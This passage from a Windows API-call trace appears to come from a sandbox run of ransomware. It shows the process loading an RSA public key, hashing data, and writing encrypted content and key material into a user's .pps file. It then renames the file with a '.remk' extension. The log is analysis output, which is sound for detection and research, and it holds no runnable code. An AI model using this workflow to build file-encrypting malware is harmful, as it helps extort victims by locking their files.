KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.385] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0235.386] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.386] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.386] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.386] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.386] GetLastError () returned 0x0 [0235.386] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.386] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0235.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.386] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.386] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.387] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.387] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eeac0 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eeaa8 [0235.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.388] GetCurrentThreadId () returned 0x314 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c45f0 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.389] GetCurrentThreadId () returned 0x314 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc480 [0235.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc468 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc480 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eead8 | out: hHeap=0x630000) returned 1 [0235.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cc80 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.393] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x1287f, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x1287f, lpOverlapped=0x0) returned 1 [0235.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.394] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12884, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.394] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.394] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.394] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.394] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.394] CloseHandle (hObject=0x640) returned 1 [0235.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0235.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0235.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\yjx2jpn3OrZ-WfDHJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\yjx2jpn3orz-wfdhj.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\yjx2jpn3OrZ-WfDHJ.pps.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\yjx2jpn3orz-wfdhj.pps.remk")) returned 1 [0235.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.398] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.399] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.399] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9011e0, ftCreationTime.dwHighDateTime=0x1d5e238, ftLastAccessTime.dwLowDateTime=0x7f398650, ftLastAccessTime.dwHighDateTime=0x1d5e7de, ftLastWriteTime.dwLowDateTime=0x7f398650, ftLastWriteTime.dwHighDateTime=0x1d5e7de, nFileSizeHigh=0x0, nFileSizeLow=0x12884, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjx2jpn3OrZ-WfDHJ.pps", cAlternateFileName="YJX2JP~1.PPS")) returned 0 [0235.399] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.400] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.400] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: 